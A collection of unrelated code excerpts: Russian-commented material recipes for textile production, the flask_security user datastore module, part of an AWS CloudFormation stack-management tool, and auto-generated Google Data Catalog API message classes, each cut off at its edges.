metadict_detail['_Производство парусины (квадратный метр)'] = {
# полульняная 50% льна, 50% хлопка
# парусина -- 500 грамм/кв.метр
'_-Производство парусины (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.5,
'Пряжа хлопчатая (килограмм)':(0.5 / 0.95) / 2,
'Пряжа льняная (килограмм)':(0.5 / 0.95) / 2,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство брезента (квадратный метр)'] = {
# Брезент пропитывают горным воском (озокеритом)
# https://ru.wikisource.org/wiki/ЭСБЕ/Брезент
# https://ru.wikisource.org/wiki/ЭСБЕ/Озокерит
# Брезент (для парусов) -- 900 грам/кв.метр
'_-Производство брезента (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.9,
'Пряжа льняная (килограмм)':0.9 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство джутовой ткани (квадратный метр)'] = {
'_-Производство джутовой ткани (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.4,
'Пряжа джутовая (килограмм)':0.4 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство мешковины (квадратный метр)'] = {
# TODO: делают из волокнистых остатков льна. "Пакля льняная"
# Мешковина, рогожа. Из рогоза, лыка, пеньки.
# Плотность 200-450 грамм/кв.метр
# Не белят и не окрашивают.
'_-Производство мешковины (квадратный метр)':1,
'Пряжа пеньковая (килограмм)':0.4 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.3,
}
metadict_detail['_Производство кирзовой ткани (квадратный метр)'] = {
# TODO:
# 1) тканевая основа.
# 2) На трехслойную ткань наносится бензоводный или латексный раствор каучука
# с различными наполнителями, красителями и вулканизирующими компонентами.
# 3) Термокамера -- на поверхности сукна образуется плёнка.
# 4) Каландрирование -- уплотнение материала
# 5) Тиснение
# https://tkanitex.ru/index.php/tkan-kirza-2/
# Трудозатраты (пока что оценочно) 1.8 нормо-часов/кв.метр
'_-Производство сукна для кирзовой ткани (квадратный метр)':1,
'Пряжа хлопчатая (килограмм)':0.3 / 0.95,
'Резина вулканизированная (килограмм)':0.1 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 1.8,
}
metadict_detail['_Производство соломенной ткани (квадратный метр)'] = {
# Плотность плетёнки: 15 пудов соломы на 365 мотков (65 аршин/моток) -- 10 грамм/аршин
# Плетёнка №0 (самая тонкая) -- 6 аршин/день от лучшего мастера
# Плетёнка №5 (толстая) -- 25 аршин/день от неумехи
'_-Производство соломенной ткани (квадратный метр)':1,
'Солома сухая (килограмм)':0.6 / 0.5,
'_Ткацкая мастерская, кустарная (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство соломенных ковров (квадратный метр)'] = {
# "Наставление к изготовлению соломенно-ковровых несгораемых крыш"
# Фермы красноуфимского реального училища.
# Пуда бечевы хватает на 400-520 аршин ковра (284-370 метров)
# Ширина станка -- 1.25 аршина (0.89 метра).
# Квадратный метр ковра -- 56 грамм бечевы.
# Ткётся двумя рабочими по 80-130 аршин/день, (57-92 метра, 50-82 кв.метра)
# Производительность труда -- 2.5-4 кв.метров/нормо-час
# 25% бечевы берут из старых ковров.
'_-Производство соломенных ковров (квадратный метр)':1,
'Солома сухая (килограмм)':2.5,
'Бечева пеньковая швейная (метр)':120 | |
"""
flask_security.datastore
~~~~~~~~~~~~~~~~~~~~~~~~
This module contains an user datastore classes.
:copyright: (c) 2012 by <NAME>.
:copyright: (c) 2019-2020 by <NAME> (jwag).
:license: MIT, see LICENSE for more details.
"""
import json
import uuid
from .utils import config_value
class Datastore:
def __init__(self, db):
self.db = db
def commit(self):
pass
def put(self, model):
raise NotImplementedError
def delete(self, model):
raise NotImplementedError
class SQLAlchemyDatastore(Datastore):
def commit(self):
self.db.session.commit()
def put(self, model):
self.db.session.add(model)
return model
def delete(self, model):
self.db.session.delete(model)
class MongoEngineDatastore(Datastore):
def put(self, model):
model.save()
return model
def delete(self, model):
model.delete()
class PeeweeDatastore(Datastore):
def put(self, model):
model.save()
return model
def delete(self, model):
model.delete_instance(recursive=True)
def with_pony_session(f):
from functools import wraps
@wraps(f)
def decorator(*args, **kwargs):
from pony.orm import db_session
from pony.orm.core import local
from flask import (
after_this_request,
current_app,
has_app_context,
has_request_context,
)
from flask.signals import appcontext_popped
register = local.db_context_counter == 0
if register and (has_app_context() or has_request_context()):
db_session.__enter__()
result = f(*args, **kwargs)
if register:
if has_request_context():
@after_this_request
def pop(request):
db_session.__exit__()
return request
elif has_app_context():
@appcontext_popped.connect_via(current_app._get_current_object())
def pop(sender, *args, **kwargs):
while local.db_context_counter:
db_session.__exit__()
else:
raise RuntimeError("Needs app or request context")
return result
return decorator
class PonyDatastore(Datastore):
def commit(self):
self.db.commit()
@with_pony_session
def put(self, model):
return model
@with_pony_session
def delete(self, model):
model.delete()
class UserDatastore:
"""Abstracted user datastore.
:param user_model: A user model class definition
:param role_model: A role model class definition
.. important::
For mutating operations, the user/role will be added to the
datastore (by calling self.put(<object>). If the datastore is session based
(such as for SQLAlchemyDatastore) it is up to caller to actually
commit the transaction by calling datastore.commit().
"""
def __init__(self, user_model, role_model):
self.user_model = user_model
self.role_model = role_model
def _prepare_role_modify_args(self, role):
if isinstance(role, str):
role = self.find_role(role)
return role
def _prepare_create_user_args(self, **kwargs):
kwargs.setdefault("active", True)
roles = kwargs.get("roles", [])
for i, role in enumerate(roles):
rn = role.name if isinstance(role, self.role_model) else role
# see if the role exists
roles[i] = self.find_role(rn)
kwargs["roles"] = roles
kwargs.setdefault("fs_uniquifier", uuid.uuid4().hex)
return kwargs
def find_user(self, *args, **kwargs):
"""Returns a user matching the provided parameters."""
raise NotImplementedError
def find_role(self, *args, **kwargs):
"""Returns a role matching the provided name."""
raise NotImplementedError
def add_role_to_user(self, user, role):
"""Adds a role to a user.
:param user: The user to manipulate. Can be an User object or email
:param role: The role to add to the user. Can be a Role object or
string role name
:return: True is role was added, False if role already existed.
"""
role = self._prepare_role_modify_args(role)
if role not in user.roles:
user.roles.append(role)
self.put(user)
return True
return False
def remove_role_from_user(self, user, role):
"""Removes a role from a user.
:param user: The user to manipulate. Can be an User object or email
:param role: The role to remove from the user. Can be a Role object or
string role name
:return: True if role was removed, False if role doesn't exist or user didn't
have role.
"""
rv = False
role = self._prepare_role_modify_args(role)
if role in user.roles:
rv = True
user.roles.remove(role)
self.put(user)
return rv
def add_permissions_to_role(self, role, permissions):
"""Add one or more permissions to role.
:param role: The role to modify. Can be a Role object or
string role name
:param permissions: a set, list, or single string.
:return: True if permissions added, False if role doesn't exist.
Caller must commit to DB.
.. versionadded:: 4.0.0
"""
rv = False
role = self._prepare_role_modify_args(role)
if role:
rv = True
role.add_permissions(permissions)
self.put(role)
return rv
def remove_permissions_from_role(self, role, permissions):
"""Remove one or more permissions from a role.
:param role: The role to modify. Can be a Role object or
string role name
:param permissions: a set, list, or single string.
:return: True if permissions removed, False if role doesn't exist.
Caller must commit to DB.
.. versionadded:: 4.0.0
"""
rv = False
role = self._prepare_role_modify_args(role)
if role:
rv = True
role.remove_permissions(permissions)
self.put(role)
return rv
def toggle_active(self, user):
"""Toggles a user's active status. Always returns True."""
user.active = not user.active
self.put(user)
return True
def deactivate_user(self, user):
"""Deactivates a specified user. Returns `True` if a change was made.
This will immediately disallow access to all endpoints that require
authentication either via session or tokens.
The user will not be able to log in again.
:param user: The user to deactivate
"""
if user.active:
user.active = False
self.put(user)
return True
return False
def activate_user(self, user):
"""Activates a specified user. Returns `True` if a change was made.
:param user: The user to activate
"""
if not user.active:
user.active = True
self.put(user)
return True
return False
def set_uniquifier(self, user, uniquifier=None):
"""Set user's Flask-Security identity key.
This will immediately render outstanding auth tokens,
session cookies and remember cookies invalid.
:param user: User to modify
:param uniquifier: Unique value - if none then uuid.uuid4().hex is used
This method is a no-op if the user model doesn't contain the attribute
``fs_uniquifier``
.. versionadded:: 3.3.0
"""
if not uniquifier:
uniquifier = uuid.uuid4().hex
user.fs_uniquifier = uniquifier
self.put(user)
def create_role(self, **kwargs):
"""
Creates and returns a new role from the given parameters.
Supported params (depending on RoleModel):
:kwparam name: Role name
:kwparam permissions: a comma delimited list of permissions, a set or a list.
These are user-defined strings that correspond to strings used with
@permissions_required()
.. versionadded:: 3.3.0
"""
# By default we just use raw DB model create - for permissions we want to
# be nicer and allow sending in a list or set or comma separated string.
if "permissions" in kwargs and hasattr(self.role_model, "permissions"):
perms = kwargs["permissions"]
if isinstance(perms, list) or isinstance(perms, set):
perms = ",".join(perms)
elif isinstance(perms, str):
# squash spaces.
perms = ",".join([p.strip() for p in perms.split(",")])
kwargs["permissions"] = perms
role = self.role_model(**kwargs)
return self.put(role)
def find_or_create_role(self, name, **kwargs):
"""Returns a role matching the given name or creates it with any
additionally provided parameters.
"""
kwargs["name"] = name
return self.find_role(name) or self.create_role(**kwargs)
def create_user(self, **kwargs):
"""Creates and returns a new user from the given parameters.
:kwparam email: required.
:kwparam password: <PASSWORD>.
:kwparam roles: list of roles to be added to user.
Can be Role objects or strings
.. note::
No normalization is done on email - it is assumed the caller has already
done that.
.. danger::
Be aware that whatever `password` is passed in will
be stored directly in the DB. Do NOT pass in a plaintext password!
Best practice is to pass in ``hash_password(plaintext_password)``.
Furthermore, no validation nor normalization is done on the password
(e.g for minimum length).
Best practice is::
pbad, pnorm = app.security._password_util.validate(password, True)
Look for `pbad` being None. Pass the normalized password `pnorm` to this
method.
The new user's ``active`` property will be set to ``True``
unless explicitly set to ``False`` in `kwargs`.
"""
kwargs = self._prepare_create_user_args(**kwargs)
user = self.user_model(**kwargs)
return self.put(user)
def delete_user(self, user):
"""Deletes the specified user.
:param user: The user to delete
"""
self.delete(user)
def reset_user_access(self, user):
"""
Use this method to reset user authentication methods in the case of compromise.
This will:
* reset fs_uniquifier - which causes session cookie, remember cookie, auth
tokens to be unusable
* remove all unified signin TOTP secrets so those can't be used
* remove all two-factor secrets so those can't be used
Note that if using unified sign in and allow 'email' as a way to receive a code;
if the email is compromised - login is still possible. To handle this - it
is better to deactivate the user.
Note - this method isn't used directly by Flask-Security - it is provided
as a helper for an application's administrative needs.
Remember to call commit on DB if needed.
.. versionadded:: 3.4.1
"""
self.set_uniquifier(user)
if hasattr(user, "us_totp_secrets"):
self.us_reset(user)
if hasattr(user, "tf_primary_method"):
self.tf_reset(user)
def tf_set(self, user, primary_method, totp_secret=None, phone=None):
"""Set two-factor info into user record.
This carefully only changes things if different.
If totp_secret isn't provided - existing one won't be changed.
If phone isn't provided, the existing phone number won't be changed.
This could be called from an application to apiori setup a user for two factor
without the user having | |
if key in boolean_keys:
value = parser.getboolean(section_name, key)
if key in not_cfn_param_keys:
self.cfn_param_file_values[key] = value
else:
self.cfn_param_file_values[key] = value
params.append(
{
'ParameterKey': key,
'ParameterValue': str(value),
'UsePreviousValue': False
}
)
return params
@staticmethod
def url_check(url):
try:
result = urlparse.urlparse(url)
return result.scheme and result.netloc and result.path
except:
return False
def cr_stack(self, stack_name, cfn_param_file, verbose=False, set_rollback='ROLLBACK', template=None):
"""
Three steps:
1. Validate template
2. Build parameters file
3. Launch Stack
:param stack_name:
:param cfn_param_file:
:param verbose:
:param set_rollback:
:param template:
:return:
"""
response = None
try:
stk_response = self.client_cfn.describe_stacks(StackName=stack_name)
print('The stack "{0}" exists. Exiting...'.format(stack_name))
sys.exit()
except ValueError as e:
raise ValueError
except ClientError as e:
pass
if template is not None:
# check if the template is a URL, or a local file
if self.url_check(template):
self.template_url = template
self.validate_cfn_template(template_url=self.template_url)
if not cfn_param_file:
cfn_param_file = self.build_cfn_param(stack_name, self.template_url, cli_template=template, verbose=verbose)
else:
template_path = os.path.abspath(template)
self.validate_cfn_template(template_body=template_path)
if not cfn_param_file:
cfn_param_file = self.build_cfn_param(stack_name, template_path, cli_template=template, verbose=verbose)
self.template_body = self.parse_cfn_template(template_path)
cfn_params = self.read_cfn_param_file(cfn_param_file)
self.cfn_param_file = cfn_param_file
try:
if self.cfn_param_file_values['TemplateURL']:
self.template_url = self.cfn_param_file_values['TemplateURL']
print("Using template from URL: {}".format(self.template_url))
except Exception as e:
if "TemplateURL" in str(e):
try:
if self.cfn_param_file_values['TemplateBody']:
self.template_body = self.cfn_param_file_values['TemplateBody']
print("Using template file: {}".format(self.template_body))
self.template_body = self.parse_cfn_template(self.template_body)
except Exception as e:
raise ValueError(e)
else:
raise ValueError(e)
print("Attempting to launch {}".format(stack_name))
try:
if self.template_url:
response = self.client_cfn.create_stack(
StackName=stack_name,
TemplateURL=self.template_url,
Parameters=cfn_params,
TimeoutInMinutes=600,
Capabilities=['CAPABILITY_IAM'],
OnFailure=set_rollback,
Tags=[
{
'Key': 'Name',
'Value': stack_name
},
{
'Key': 'cfnctl_param_file',
'Value': os.path.basename(self.cfn_param_file)
},
]
)
elif self.template_body:
response = self.client_cfn.create_stack(
StackName=stack_name,
TemplateBody=self.template_body,
Parameters=cfn_params,
TimeoutInMinutes=600,
Capabilities=['CAPABILITY_IAM'],
OnFailure=set_rollback,
Tags=[
{
'Key': 'Name',
'Value': stack_name
},
{
'Key': 'cfnctl_param_file',
'Value': os.path.basename(self.cfn_param_file)
},
]
)
except ClientError as e:
print(e.response['Error']['Message'])
return
stack_rc = self.stack_status(stack_name=stack_name)
if stack_rc != 'CREATE_COMPLETE':
print('Stack creation failed with {0}'.format(stack_rc))
return
self.asg = self.get_asg_from_stack(stack_name=stack_name)
self.instances = self.get_inst_from_asg(self.asg)
try:
if self.cfn_param_file_values['EnableEnaVfi']:
print("Instances finishing booting")
time.sleep(60)
self.enable_ena_vfi(self.instances)
except KeyError:
pass
try:
if self.cfn_param_file_values['AddNetInterfaces']:
self.add_net_dev()
except KeyError:
pass
stk_output = self.get_stack_output(stack_name)
try:
eip = stk_output['ElasticIP']
self.set_elastic_ip(stack_eip=eip)
except KeyError:
pass
self.stack_name = stack_name
self.get_stack_info(stack_name=stack_name)
return response
def del_stack(self,stack_name, no_prompt=None):
try:
stk_response = self.client_cfn.describe_stacks(StackName=stack_name)
if stk_response['Stacks'][0]['StackStatus'] == "DELETE_IN_PROGRESS":
print('{0} already being deleted'.format(stack_name))
return
for t in (stk_response['Stacks'][0]['Tags']):
if t['Key'] == "cfnctl_param_file":
f_path = os.path.join(self.cfn_param_file_dir, t['Value'])
if os.path.isfile(f_path):
if no_prompt:
try:
os.remove(f_path)
print('Removed parameters file {0}'.format(f_path))
except Exception as e:
raise ValueError(e)
else:
cli_val = input('Parameters file "{0}" exists, delete also? [y/N] '.format(f_path))
if not cli_val:
cli_val = 'n'
if cli_val.lower().startswith("y"):
try:
os.remove(f_path)
print('Removed parameters file {0}'.format(f_path))
except Exception as e:
raise ValueError(e)
else:
pass
except ClientError as e:
raise ValueError(e)
print('Deleting {}'.format(stack_name))
try:
response = self.client_cfn.delete_stack(StackName=stack_name)
except Exception as e:
raise ValueError(e)
sc = response['ResponseMetadata']['HTTPStatusCode']
if sc != 200:
errmsg = 'Problem deleting stack, status code {}'.format(sc)
raise ValueError(errmsg)
return
def ls_stacks(self, stack_name=None, show_deleted=False):
"""
Using paginator for getting stack info, as the client.list_stack() will not get older stacks (>6 months)
:param stack_name: stack_name
:param show_deleted: Should we show deleted stacks also, StackStatus == DELETE_COMPLETE
:return: dictionary of stacks, formatting needs to happen after the return
"""
all_stacks = list()
paginator = self.client_cfn.get_paginator('list_stacks')
response_iterator = paginator.paginate()
stacks = dict()
show_stack = False
for page in response_iterator:
all_stacks = page['StackSummaries']
for r in all_stacks:
if [r['StackName']] == stack_name:
show_stack = True
elif show_deleted and r['StackStatus'] == "DELETE_COMPLETE":
show_stack = True
elif r['StackStatus'] == "DELETE_COMPLETE":
show_stack = False
else:
show_stack = True
if show_stack:
try:
stacks[r['StackName']] = [str(r['CreationTime']), r['StackStatus'], r['TemplateDescription']]
except Exception as e:
stacks[r['StackName']] = [str(r['CreationTime']), r['StackStatus'], "No Description"]
return stacks
def create_net_dev(self, subnet_id_n, desc, sg):
"""
Creates a network device, returns the id
:return: network device id
"""
response = self.client_ec2.create_network_interface(SubnetId=subnet_id_n, Description=desc, Groups=[sg])
return response['NetworkInterface']['NetworkInterfaceId']
def attach_new_dev(self, i_id, dev_num, subnet_id, desc, sg):
net_dev_to_attach = (self.create_net_dev(subnet_id, desc, sg))
response = self.client_ec2.attach_network_interface(
DeviceIndex=dev_num,
InstanceId=i_id,
NetworkInterfaceId=net_dev_to_attach
)
return response['AttachmentId']
def add_net_dev(self):
print("Adding network interfaces")
attach_resp = None
for i in self.instances:
instance = self.ec2.Instance(i)
num_interfaces_b = (len(instance.network_interfaces))
num_interfaces = num_interfaces_b
num_int_count = 0
while num_interfaces < int(self.cfn_param_file_values['TotalNetInterfaces']):
attach_resp = self.attach_new_dev(i,
num_interfaces_b + num_int_count,
self.cfn_param_file_values['Subnet'],
self.stack_name + "-net_dev",
self.cfn_param_file_values['SecurityGroups']
)
instance = self.ec2.Instance(i)
num_interfaces = (len(instance.network_interfaces))
num_int_count += 1
print(" {0} {1} {2}".format(instance.id, num_interfaces_b, num_interfaces))
time.sleep(10)
return attach_resp
def get_stack_events(self, stack_name):
try:
paginator = self.client_cfn.get_paginator('describe_stack_events')
pages = paginator.paginate(StackName=stack_name, PaginationConfig={'MaxItems': 100})
return next(iter(pages))["StackEvents"]
except Exception as e:
raise ValueError(e)
def stack_status(self, stack_name=None):
if stack_name is None:
stack_name = self.stack_name
all_events = list()
events = True
stack_return_list = [
'CREATE_COMPLETE',
'ROLLBACK_COMPLETE',
'CREATE_FAILED'
]
while events:
stk_status = self.get_stack_events(stack_name)
for s in reversed(stk_status):
event_id = s['EventId']
if event_id not in all_events:
all_events.append(event_id)
try:
print('{0:<38} : {1:<25} : {2}'.format(s['LogicalResourceId'], s['ResourceStatus'], s['ResourceStatusReason']))
except KeyError:
print('{0:<38} : {1:<25}'.format(s['LogicalResourceId'], s['ResourceStatus']))
except Exception as e:
raise ValueError(e)
if s['LogicalResourceId'] == stack_name and s['ResourceStatus'] in stack_return_list:
events = False
return s['ResourceStatus']
time.sleep(1)
def has_elastic_ip(self, inst_arg=None):
if not self.instances and inst_arg is None:
print("Instance list is null, exiting")
return
if inst_arg is not None:
self.instances = inst_arg
for i in self.instances:
response = self.client_ec2.describe_instances(InstanceIds=[i], DryRun=False)
for r in response['Reservations']:
for s in (r['Instances']):
for interface in s['NetworkInterfaces']:
response = self.client_ec2.describe_network_interfaces(
NetworkInterfaceIds=[interface['NetworkInterfaceId']],
DryRun=False)
for r_net in response['NetworkInterfaces']:
try:
if r_net['Association'].get('AllocationId'):
return r_net['Association'].get('PublicIp')
except KeyError:
pass
def get_netdev0_id(self, instance=None):
if instance is None:
print("Must specify one instance")
return
response = self.client_ec2.describe_instances(InstanceIds=[instance], DryRun=False)
for r in response['Reservations']:
for s in (r['Instances']):
for interface in s['NetworkInterfaces']:
if interface['Attachment']['DeviceIndex'] == 0:
return interface['NetworkInterfaceId']
def set_elastic_ip(self, instances=None, stack_eip=None):
launch_time = dict()
if instances is None:
instances = self.instances
has_eip = self.has_elastic_ip(instances)
if has_eip:
print('Elastic IP already allocated: ' + has_eip)
return has_eip
else:
response = self.client_ec2.describe_instances(InstanceIds=instances, DryRun=False)
for r in response['Reservations']:
for resp_i in (r['Instances']):
i = resp_i['InstanceId']
time_tuple = (resp_i['LaunchTime'].timetuple())
launch_time_secs = time.mktime(time_tuple)
launch_time[i] = launch_time_secs
launch_time_list = sorted(launch_time.items(), key=operator.itemgetter(1))
inst_to_alloc_eip = launch_time_list[1][0]
netdev0 = self.get_netdev0_id(inst_to_alloc_eip)
if not netdev0:
print("Couldn't get first device")
return
try:
if stack_eip is not None:
allocation_id = self.get_net_alloc_id(stack_eip)
ip_addr = stack_eip
else:
allocation = self.client_ec2.allocate_address(Domain='vpc')
allocation_id = allocation['AllocationId']
ip_addr = allocation['PublicIp']
response = self.client_ec2.associate_address(
AllocationId=allocation_id,
NetworkInterfaceId=netdev0
)
print('{0} now has Elastic IP address {1}'.format(inst_to_alloc_eip, ip_addr))
return ip_addr
except ClientError as e:
print(e)
return response
def get_stack_output(self, stack_name=None):
if stack_name is None:
stack_name = self.stack_name
stk_response = None
try:
stk_response = self.client_cfn.describe_stacks(StackName=stack_name)
except ClientError as e:
print(e)
stk_output = dict()
#for i in stk_response['Stacks']:
# try:
# for r in i['Outputs']:
# stk_output[r['OutputKey']] = r['OutputValue']
# except KeyError:
# print("No Outputs found")
return stk_output
def get_net_alloc_id(self, ip=None):
if ip is None:
print("Must specify an IP address")
return
response = self.client_ec2.describe_addresses(PublicIps=[ip], DryRun=False)
for r in response['Addresses']:
return r['AllocationId']
def get_stack_info(self, stack_name=None):
if stack_name is None:
stack_name = self.stack_name
stack_status = self.ls_stacks(stack_name=stack_name)
for stack, i in sorted(stack_status.items()):
if stack == stack_name:
print("\nStatus:")
print('{0:<40.38} {1:<21.19} {2:<30.28} {3:<.30}'.format(stack, str(i[0]), i[1], i[2]))
print("")
response = self.client_cfn.describe_stacks(StackName=stack_name)
for i in response['Stacks']:
print('[Parameters]')
try:
for p in i['Parameters']:
print('{0:<38} = {1:<30}'.format(p['ParameterKey'], p['ParameterValue']))
except Exception as e:
print("No Parameters found")
raise ValueError(e)
print("")
print('[Outputs]')
try:
for o in i['Outputs']:
print('{0:<38} = {1:<30}'.format(o['OutputKey'], o['OutputValue']))
except Exception as e:
print("No Outputs found")
#print(ValueError(e))
print("")
return
@staticmethod
def get_bucket_and_key_from_url(url):
path = urlparse.urlparse(url).path
path_l = path.split('/')
bucket = path_l[1]
key = '/'.join(path_l[2:])
return bucket, key
def get_cfn_param_file(self, template=None):
self.cfn_param_file_basename = os.path.basename(template)
self.cfn_param_file = os.path.join(self.cfn_param_file_dir, self.cfn_param_file_basename)
return self.cfn_param_file
def rm_cfn_param_file(self, cfn_param_file=None):
if cfn_param_file is None:
cfn_param_file = self.cfn_param_file
print('Removing incomplete parameters file {0}'.format(cfn_param_file))
if os.path.exists(cfn_param_file):
os.remove(cfn_param_file)
return
else:
print('File does not exists: {0}'.format(cfn_param_file))
sys.exit()
sys.exit(1)
def set_vpc_cfn_param_file(self, cfn_param_file='NULL', json_content=None, p=None ):
##print(self.vpc_variable_name)
if cfn_param_file == 'NULL':
cfn_param_file = self.cfn_param_file
print('Getting VPC info...')
all_vpcs = self.get_vpcs()
vpc_ids = list()
for vpc_k, vpc_values in all_vpcs.items():
vpc_ids.append(vpc_k)
#print(vpc_ids)
for vpc_id, vpc_info in all_vpcs.items():
try:
print(' {0} | {1} | {2} | {3}'.format(vpc_id, vpc_info['CidrBlock'], vpc_info['IsDefault'],
vpc_info['Tag_Name']))
except:
print(' {0} | {1} | {2}'.format(vpc_id, vpc_info['CidrBlock'], vpc_info['IsDefault']))
prompt_msg = "Select VPC"
cli_val = self.get_cli_value(json_content, self.vpc_variable_name, prompt_msg)
if cli_val not in vpc_ids:
print("Valid VPC required. Exiting... ")
self.rm_cfn_param_file(cfn_param_file)
return
self.vpc_id = cli_val
return self.vpc_id
def get_cli_value(self, json_content, p, prompt_msg):
cli_val = ""
default_val = ""
try:
default_val = json_content['Parameters'][p]['Default']
except KeyError:
pass
cli_val = input('{0} [{1}]: '.format(prompt_msg, default_val))
if cli_val == "":
cli_val = default_val
cli_val | |
<filename>google-cloud-sdk/lib/googlecloudsdk/third_party/apis/datacatalog/v1beta1/datacatalog_v1beta1_messages.py
"""Generated message classes for datacatalog version v1beta1.
A fully managed and highly scalable data discovery and metadata management
service.
"""
# NOTE: This file is autogenerated and should not be edited by hand.
from apitools.base.protorpclite import messages as _messages
from apitools.base.py import encoding
package = 'datacatalog'
class Binding(_messages.Message):
r"""Associates `members` with a `role`.
Fields:
condition: The condition that is associated with this binding. NOTE: An
unsatisfied condition will not allow user access via current binding.
Different bindings, including their conditions, are examined
independently.
members: Specifies the identities requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet;
with or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example,
`<EMAIL>` . * `serviceAccount:{emailid}`: An email address
that represents a service account. For example, `my-other-
<EMAIL>`. * `group:{emailid}`: An email address
that represents a Google group. For example, `<EMAIL>`. *
`deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique
identifier) representing a user that has been recently deleted. For
example, `<EMAIL>?uid=123456789012345678901`. If the user is
recovered, this value reverts to `user:{emailid}` and the recovered user
retains the role in the binding. *
`deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address
(plus unique identifier) representing a service account that has been
recently deleted. For example, `my-other-
<EMAIL>?uid=123456789012345678901`. If the
service account is undeleted, this value reverts to
`serviceAccount:{emailid}` and the undeleted service account retains the
role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An
email address (plus unique identifier) representing a Google group
that has been recently deleted. For example,
`<EMAIL>?uid=123456789012345678901`. If the group is
recovered, this value reverts to `group:{emailid}` and the recovered
group retains the role in the binding. * `domain:{domain}`: The G
Suite domain (primary) that represents all the users of that domain.
For example, `google.com` or `example.com`.
role: Role that is assigned to `members`. For example, `roles/viewer`,
`roles/editor`, or `roles/owner`.
"""
condition = _messages.MessageField('Expr', 1)
members = _messages.StringField(2, repeated=True)
role = _messages.StringField(3)
class DatacatalogEntriesLookupRequest(_messages.Message):
r"""A DatacatalogEntriesLookupRequest object.
Fields:
linkedResource: The full name of the Google Cloud Platform resource the
Data Catalog entry represents. See:
https://cloud.google.com/apis/design/resource_names#full_resource_name.
Full names are case-sensitive. Examples: * //bigquery.googleapis.com/
projects/projectId/datasets/datasetId/tables/tableId *
//pubsub.googleapis.com/projects/projectId/topics/topicId
sqlResource: The SQL name of the entry. SQL names are case-sensitive.
Examples: * `cloud_pubsub.project_id.topic_id` *
``pubsub.project_id.`topic.id.with.dots` `` *
`bigquery.table.project_id.dataset_id.table_id` *
`bigquery.dataset.project_id.dataset_id` *
`datacatalog.entry.project_id.location_id.entry_group_id.entry_id`
`*_id`s shoud satisfy the standard SQL rules for identifiers.
https://cloud.google.com/bigquery/docs/reference/standard-sql/lexical.
"""
linkedResource = _messages.StringField(1)
sqlResource = _messages.StringField(2)
class DatacatalogProjectsLocationsEntryGroupsCreateRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsCreateRequest object.
Fields:
entryGroupId: Required. The id of the entry group to create. The id must
begin with a letter or underscore, contain only English letters, numbers
and underscores, and be at most 64 characters.
googleCloudDatacatalogV1beta1EntryGroup: A
GoogleCloudDatacatalogV1beta1EntryGroup resource to be passed as the
request body.
parent: Required. The name of the project this entry group is in. Example:
* projects/{project_id}/locations/{location} Note that this EntryGroup
and its child resources may not actually be stored in the location in
this name.
"""
entryGroupId = _messages.StringField(1)
googleCloudDatacatalogV1beta1EntryGroup = _messages.MessageField('GoogleCloudDatacatalogV1beta1EntryGroup', 2)
parent = _messages.StringField(3, required=True)
class DatacatalogProjectsLocationsEntryGroupsDeleteRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsDeleteRequest object.
Fields:
force: Optional. If true, deletes all entries in the entry group.
name: Required. The name of the entry group. For example,
`projects/{project_id}/locations/{location}/entryGroups/{entry_group_id}
`.
"""
force = _messages.BooleanField(1)
name = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesCreateRequest object.
Fields:
entryId: Required. The id of the entry to create.
googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry
resource to be passed as the request body.
parent: Required. The name of the entry group this entry is in. Example:
*
projects/{project_id}/locations/{location}/entryGroups/{entry_group_id}
Note that this Entry and its child resources may not actually be stored
in the location in this name.
"""
entryId = _messages.StringField(1)
googleCloudDatacatalogV1beta1Entry = _messages.MessageField('GoogleCloudDatacatalogV1beta1Entry', 2)
parent = _messages.StringField(3, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesDeleteRequest object.
Fields:
name: Required. The name of the entry. Example: * projects/{project_id}/l
ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id}
"""
name = _messages.StringField(1, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetIamPolicyRequest
object.
Fields:
getIamPolicyRequest: A GetIamPolicyRequest resource to be passed as the
request body.
resource: REQUIRED: The resource for which the policy is being requested.
See the operation documentation for the appropriate value for this
field.
"""
getIamPolicyRequest = _messages.MessageField('GetIamPolicyRequest', 1)
resource = _messages.StringField(2, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesGetRequest object.
Fields:
name: Required. The name of the entry. Example: * projects/{project_id}/l
ocations/{location}/entryGroups/{entry_group_id}/entries/{entry_id}
Entry groups are logical groupings of entries. Currently, users cannot
create/modify entry groups. They are created by Data Catalog; they
include `@bigquery` for all BigQuery entries, and `@pubsub` for all
Cloud Pub/Sub entries.
"""
name = _messages.StringField(1, required=True)
class DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest(_messages.Message):
r"""A DatacatalogProjectsLocationsEntryGroupsEntriesPatchRequest object.
Fields:
googleCloudDatacatalogV1beta1Entry: A GoogleCloudDatacatalogV1beta1Entry
